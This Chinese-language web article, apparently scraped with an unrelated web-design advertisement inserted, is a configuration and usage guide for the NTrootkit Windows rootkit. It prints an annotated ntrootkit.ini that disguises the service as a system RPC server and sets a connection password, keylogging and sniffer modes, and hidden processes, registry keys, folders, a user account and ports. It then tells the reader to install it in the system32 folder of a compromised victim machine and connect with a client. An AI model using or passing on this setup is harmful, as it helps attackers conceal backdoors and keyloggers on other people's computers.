Rootkit之ntrootkit的配置使用
NTrootkit
成都创新互联是一家专业提供本溪企业网站建设,专注与网站建设、成都网站设计、H5开发、小程序制作等业务。10年已为本溪众多企业、政府机构等服务。创新互联专业的建站公司优惠进行中。
一,配置方法
\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL] //下面为配置内容
\\servicename is the ntrootkit 's servicename
servicename=tsserver //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver //安装目录
connpass=12345 //连接密码
appname=51cto.exe
keylog=0 //0为不记录键盘
workmode=1 //0为sniffer模式
[HIDDEN PROCNAME] //要隐藏的服务名
51cto
[HIDDEN REGKEY] //要隐藏的注册表键
zero\soft\...\...\xxx
[HIDDEN REGVALUE] //要隐藏的注册表键值
zero\soft\...\...
[HIDDEN FILEDIR] //要隐藏的文件目录
c:\rootkit
[HIDDEN SERVICE] //要隐藏的服务名
servicert
[HIDDEN USER] //要隐藏的用户名
zerosecurity
[HIDDEN TCPPORT] //要隐藏的tcp端口
tcpport=5768
[HIDDEN UDPPORT] //要隐藏的udp端口
udpport=4000
二,使用方法
①:将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下,然后运行ntrootkit.exe安装;ntrootkit -u password 可卸载;
②:客户端用rtclient连接;
网站名称:Rootkit之ntrootkit的配置使用
文章来源:http://cdiso.cn/article/ghigoj.html